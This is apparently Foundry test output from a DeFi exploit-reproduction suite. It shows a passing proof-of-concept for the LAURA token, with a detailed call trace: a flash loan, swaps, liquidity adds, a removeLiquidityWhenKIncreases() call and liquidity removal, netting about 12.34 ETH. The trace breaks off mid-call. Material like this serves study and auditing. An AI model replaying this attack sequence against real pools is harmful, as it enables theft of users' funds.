Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.42s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2072): Unused local variable.
  --> src/test/2025-01/LAURAToken_exp.sol:92:9:
   |
92 |         uint256 bal0 = IERC20(weth).balanceOf(address(this)); // L18
   |         ^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2025-01/LAURAToken_exp.sol:93:9:
   |
93 |         uint256 bal1 = IERC20(weth).balanceOf(pairLAURA_WETH); // L19
   |         ^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.93s (2.24ms CPU time)

Ran 1 test for src/test/2025-01/LAURAToken_exp.sol:LAURAToken_exp
[PASS] testPoC() (gas: 1756262)
Logs:
  Final balance in ETH : 12340357077284305206

Traces:
  [3649] LAURAToken_exp::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 21529887 [2.152e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1858262] LAURAToken_exp::testPoC()
    ├─ [0] VM::startPrank(attacker: [0x9dF0C6b0066D5317aA5b38B36850548DaCCa6B4e])
    │   └─ ← [Return]
    ├─ [1815195] → new AttackerC0@0x959951c51b3e4B4eaa55a13D1d761e14Ad0A1d6a
    │   ├─ [1343895] → new AttackerC1@0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2
    │   │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x00654f542953d55518f8c2ba93d6a2a69d2947668f1502f816b52be57ec0ed2a: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] 6574 bytes of code
    │   ├─ [423318] AttackerC1::attack()
    │   │   ├─ [2381] 0xb292678438245Ec863F9FEa64AFfcEA887144240::token0() [staticcall]
    │   │   │   └─ ← [Return] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89
    │   │   ├─ [27315] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ [24637] 0x539D54074E052ae82de4936Ae6BB213AB773559E::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   │   ├─ emit Approval(owner: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xbd56633204ebe5d18bf9e0c1856ca4eab9ae4131565fd1b63738c213dd14d7d8: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [364238] 0xBA12222222228d8Ba445958a75a0704d566BF2C8::flashLoan(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [30000000000000000000000 [3e22]], 0x000000000000000000000000b292678438245ec863f9fea64affcea887144240)
    │   │   │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8) [staticcall]
    │   │   │   │   └─ ← [Return] 32977545748157180924438 [3.297e22]
    │   │   │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─ [27962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 30000000000000000000000 [3e22])
    │   │   │   │   ├─ emit Transfer(from: 0xBA12222222228d8Ba445958a75a0704d566BF2C8, to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], value: 30000000000000000000000 [3e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x0000000000000000000000000000000000000000000006fbb761df6c5e3bd216 → 0x0000000000000000000000000000000000000000000000a169bf823c477bd216
    │   │   │   │   │   @ 0x6ea3e27d25b3a250b6e03722c916b2f406ced69192fd5b78be1bafeaade7a467: 0 → 0x00000000000000000000000000000000000000000000065a4da25d3016c00000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [312853] AttackerC1::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [30000000000000000000000 [3e22]], [0], 0x000000000000000000000000b292678438245ec863f9fea64affcea887144240)
    │   │   │   │   ├─ [381] 0xb292678438245Ec863F9FEa64AFfcEA887144240::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 30000000000000000000000 [3e22]
    │   │   │   │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   └─ ← [Return] 16466070319256275422 [1.646e19]
    │   │   │   │   ├─ [85322] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(11526249223479392795400 [1.152e22], 0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89], AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ [6225] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0xb292678438245Ec863F9FEa64AFfcEA887144240, 11526249223479392795400 [1.152e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], to: 0xb292678438245Ec863F9FEa64AFfcEA887144240, value: 11526249223479392795400 [1.152e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x6ea3e27d25b3a250b6e03722c916b2f406ced69192fd5b78be1bafeaade7a467: 0x00000000000000000000000000000000000000000000065a4da25d3016c00000 → 0x0000000000000000000000000000000000000000000003e976cb151e778304f8
    │   │   │   │   │   │   │   @ 0xc0809db1e4ce3cd10e251fe0ccd014d4a6c274d92ce61b032235255c192b6a77: 0x000000000000000000000000000000000000000000000000e4833bb6e1df89de → 0x000000000000000000000000000000000000000000000271bb5a83c8811c84e6
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [2751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   │   ├─ [2579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   ├─ [2504] 0xb292678438245Ec863F9FEa64AFfcEA887144240::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 6099572126618875527765833 [6.099e24], 16466070319256275422 [1.646e19], 1735736063 [1.735e9]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 11542715293798649070822 [1.154e22]
    │   │   │   │   │   ├─ [65365] 0xb292678438245Ec863F9FEa64AFfcEA887144240::swap(6090844737683950823905816 [6.09e24], 0, AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0x)
    │   │   │   │   │   │   ├─ [34757] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::transfer(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 6090844737683950823905816 [6.09e24])
    │   │   │   │   │   │   │   ├─ [34579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::transfer(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 6090844737683950823905816 [6.09e24]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xb292678438245Ec863F9FEa64AFfcEA887144240, to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], value: 6090844737683950823905816 [6.09e24])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x3c3f86b3bfb9ebd96b8c1433a21c82b94034bb1e7126d8727767a142b855f6f4: 0x000000000000000000000000000000000000000000050ba277b111b32b011f49 → 0x0000000000000000000000000000000000000000000001d91cda0ca02db38531
    │   │   │   │   │   │   │   │   │   @ 0x59df4c67690e213c36bb4b4bd2d4893b5d0088ee60d82c462e88a6d11be8cf93: 0 → 0x0000000000000000000000000000000000000000000509c95ad70512fd4d9a18
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 8727388934924703860017 [8.727e21]
    │   │   │   │   │   │   │   └─ ← [Return] 8727388934924703860017 [8.727e21]
    │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 11542715293798649070822 [1.154e22]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 8727388934924703860017 [8.727e21], reserve1: 11542715293798649070822 [1.154e22])
    │   │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 11526249223479392795400 [1.152e22], amount0Out: 6090844737683950823905816 [6.09e24], amount1Out: 0, to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 9: 0x00000000000000000000000000000000000097531e49c7cf060a3b2d7823f77c → 0x000000000000000000000000000000000000987c56eb680727a3fb7647153e4c
    │   │   │   │   │   │   │   @ 10: 0x0000000000000000000000000124befb34bcdf2b7c7cd8cb3fe167085c460d1c → 0x0000000000000000000000000124e41329d35f752e2f30e5d97f0b3744cc2d6c
    │   │   │   │   │   │   │   @ 8: 0x67753aff000000000000e4833bb6e1df89de000000050ba277b111b32b011f49 → 0x6775418f000000000271bb5a83c8811c84e60000000001d91cda0ca02db38531
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 6090844737683950823905816 [6.09e24]
    │   │   │   │   │   │   └─ ← [Return] 6090844737683950823905816 [6.09e24]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [delegatecall]
    │   │   │   │   │   │   └─ ← [Return] 6090844737683950823905816 [6.09e24]
    │   │   │   │   │   └─ ← [Return] 6090844737683950823905816 [6.09e24]
    │   │   │   │   ├─ [73181] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::addLiquidity(0x05641E33Fd15BAf819729dF55500b07b82Eb8E89, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 6090844737683950823905816 [6.09e24], 11526249223479392795400 [1.152e22], 0, 0, AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ [2564] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::getPair(0x05641E33Fd15BAf819729dF55500b07b82Eb8E89, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0xb292678438245Ec863F9FEa64AFfcEA887144240
    │   │   │   │   │   ├─ [504] 0xb292678438245Ec863F9FEa64AFfcEA887144240::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 8727388934924703860017 [8.727e21], 11542715293798649070822 [1.154e22], 1735737743 [1.735e9]
    │   │   │   │   │   ├─ [11053] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::transferFrom(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0xb292678438245Ec863F9FEa64AFfcEA887144240, 8714939022036080887320 [8.714e21])
    │   │   │   │   │   │   ├─ [10869] 0x539D54074E052ae82de4936Ae6BB213AB773559E::transferFrom(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0xb292678438245Ec863F9FEa64AFfcEA887144240, 8714939022036080887320 [8.714e21]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], to: 0xb292678438245Ec863F9FEa64AFfcEA887144240, value: 8714939022036080887320 [8.714e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564030742644985877048752615 [1.157e77])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x59df4c67690e213c36bb4b4bd2d4893b5d0088ee60d82c462e88a6d11be8cf93: 0x0000000000000000000000000000000000000000000509c95ad70512fd4d9a18 → 0x0000000000000000000000000000000000000000000507f0eac3f2421a881400
    │   │   │   │   │   │   │   │   @ 0x3c3f86b3bfb9ebd96b8c1433a21c82b94034bb1e7126d8727767a142b855f6f4: 0x0000000000000000000000000000000000000000000001d91cda0ca02db38531 → 0x0000000000000000000000000000000000000000000003b18ced1f7110790b49
    │   │   │   │   │   │   │   │   @ 0xbd56633204ebe5d18bf9e0c1856ca4eab9ae4131565fd1b63738c213dd14d7d8: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffe278feced2f1d3a79e7
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [3425] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0xb292678438245Ec863F9FEa64AFfcEA887144240, 11526249223479392795400 [1.152e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], to: 0xb292678438245Ec863F9FEa64AFfcEA887144240, value: 11526249223479392795400 [1.152e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x6ea3e27d25b3a250b6e03722c916b2f406ced69192fd5b78be1bafeaade7a467: 0x0000000000000000000000000000000000000000000003e976cb151e778304f8 → 0x0000000000000000000000000000000000000000000001789ff3cd0cd84609f0
    │   │   │   │   │   │   │   @ 0xc0809db1e4ce3cd10e251fe0ccd014d4a6c274d92ce61b032235255c192b6a77: 0x000000000000000000000000000000000000000000000271bb5a83c8811c84e6 → 0x0000000000000000000000000000000000000000000004e29231cbda20597fee
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [46784] 0xb292678438245Ec863F9FEa64AFfcEA887144240::mint(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2])
    │   │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 17442327956960784747337 [1.744e22]
    │   │   │   │   │   │   │   └─ ← [Return] 17442327956960784747337 [1.744e22]
    │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 23068964517278041866222 [2.306e22]
    │   │   │   │   │   │   ├─ [2314] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], value: 9985734664764621968615 [9.985e21])
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 17442327956960784747337 [1.744e22], reserve1: 23068964517278041866222 [2.306e22])
    │   │   │   │   │   │   ├─ emit Mint(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0: 8714939022036080887320 [8.714e21], amount1: 11526249223479392795400 [1.152e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x68bb62fddff5d55b3c2bc92c3abd5632cdf4af9f312d61737e61eab73481ae02: 0 → 0x00000000000000000000000000000000000000000000021d53e822e9e7add4e7
    │   │   │   │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000043b6dc8eca499edd4e7
    │   │   │   │   │   │   │   @ 8: 0x6775418f000000000271bb5a83c8811c84e60000000001d91cda0ca02db38531 → 0x6775418f0000000004e29231cbda20597fee0000000003b18ced1f7110790b49
    │   │   │   │   │   │   └─ ← [Return] 9985734664764621968615 [9.985e21]
    │   │   │   │   │   └─ ← [Return] 8714939022036080887320 [8.714e21], 11526249223479392795400 [1.152e22], 9985734664764621968615 [9.985e21]
    │   │   │   │   ├─ [14325] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::removeLiquidityWhenKIncreases()
    │   │   │   │   │   ├─ [14162] 0x539D54074E052ae82de4936Ae6BB213AB773559E::removeLiquidityWhenKIncreases() [delegatecall]
    │   │   │   │   │   │   ├─ [504] 0xb292678438245Ec863F9FEa64AFfcEA887144240::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 17442327956960784747337 [1.744e22], 23068964517278041866222 [2.306e22], 1735737743 [1.735e9]
    │   │   │   │   │   │   ├─ [357] 0xb292678438245Ec863F9FEa64AFfcEA887144240::token1() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
    │   │   │   │   │   │   ├─ [7803] 0xb292678438245Ec863F9FEa64AFfcEA887144240::sync()
    │   │   │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 4334828289544710831315 [4.334e21]
    │   │   │   │   │   │   │   │   └─ ← [Return] 4334828289544710831315 [4.334e21]
    │   │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 23068964517278041866222 [2.306e22]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 4334828289544710831315 [4.334e21], reserve1: 23068964517278041866222 [2.306e22])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x6775418f0000000004e29231cbda20597fee0000000003b18ced1f7110790b49 → 0x6775418f0000000004e29231cbda20597fee0000000000eafdd3c26fb2a0bcd3
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x3c3f86b3bfb9ebd96b8c1433a21c82b94034bb1e7126d8727767a142b855f6f4: 0x0000000000000000000000000000000000000000000003b18ced1f7110790b49 → 0x0000000000000000000000000000000000000000000000eafdd3c26fb2a0bcd3
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return]
    │   │   │   │   ├─ [24442] 0xb292678438245Ec863F9FEa64AFfcEA887144240::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x4a1c83c0e1041e491f48ad8f5fa1865cdcf54d198e97f55c8b3e6bcfff69e3a3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [480] 0xb292678438245Ec863F9FEa64AFfcEA887144240::balanceOf(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 9985734664764621968615 [9.985e21]
    │   │   │   │   ├─ [53516] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::removeLiquidity(0x05641E33Fd15BAf819729dF55500b07b82Eb8E89, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 9985734664764621968615 [9.985e21], 0, 0, AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ [25270] 0xb292678438245Ec863F9FEa64AFfcEA887144240::transferFrom(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 0xb292678438245Ec863F9FEa64AFfcEA887144240, 9985734664764621968615 [9.985e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], to: 0xb292678438245Ec863F9FEa64AFfcEA887144240, value: 9985734664764621968615 [9.985e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xcdb8a2af510e9088603a0bdb160f78447b41467a390f2bc0cbcb76fe99726a07: 0 → 0x00000000000000000000000000000000000000000000021d53e822e9e7add4e7
    │   │   │   │   │   │   │   @ 0x68bb62fddff5d55b3c2bc92c3abd5632cdf4af9f312d61737e61eab73481ae02: 0x00000000000000000000000000000000000000000000021d53e822e9e7add4e7 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [25889] 0xb292678438245Ec863F9FEa64AFfcEA887144240::burn(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2])
    │   │   │   │   │   │   ├─ [751] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   ├─ [579] 0x539D54074E052ae82de4936Ae6BB213AB773559E::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 4334828289544710831315 [4.334e21]
    │   │   │   │   │   │   │   └─ ← [Return] 4334828289544710831315 [4.334e21]
    │   │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xb292678438245Ec863F9FEa64AFfcEA887144240) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 23068964517278041866222 [2.306e22]
    │   │   │   │   │   │   ├─ [314] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xb292678438245Ec863F9FEa64AFfcEA887144240, to: 0x0000000000000000000000000000000000000000, value: 9985734664764621968615 [9.985e21])
    │   │   │   │   │   │   ├─ [4057] 0x05641E33Fd15BAf819729dF55500b07b82Eb8E89::transfer(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 2165867096846036817930 [2.165e21])
    │   │   │   │   │   │   │   ├─ [3879] 0x539D54074E052ae82de4936Ae6BB213AB773559E::transfer(AttackerC1: [0x9F96E1Bd8579e11Dc6D012945b65C954738b00a2], 2165867096846036817930 [2.165e21]) [delegatecall]
